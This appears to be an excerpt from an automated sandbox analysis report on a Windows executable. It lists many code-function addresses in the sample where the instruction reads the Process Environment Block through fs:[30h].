        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01313B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01313B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EDB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B8B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EDB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EF358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01314BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01314BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01314BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B5BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131B390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0139D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013103E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013103E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013103E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013103E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013103E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013103E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130DBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013923E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013923E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013923E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013653CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013653CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01324A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01324A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F8A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01303A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EAA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E5210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E5210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0132927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0139B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0139B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B8A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01374257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AEA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131FAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E52A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131D294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0136A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AE539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01314D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01314D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01314D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B8D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EAD30 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130C577 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01307D50 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01323D43 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01363540 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01393D40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01311DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01311DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01311DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013135A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B05AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E2D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131FD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01398DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013AFDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366DC9 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131BC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A1C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131AC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131A44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A4496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012F849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A14FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01366CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B8CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E4F2E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E4F2E mov eax, dword ptr fs:[00000030h]
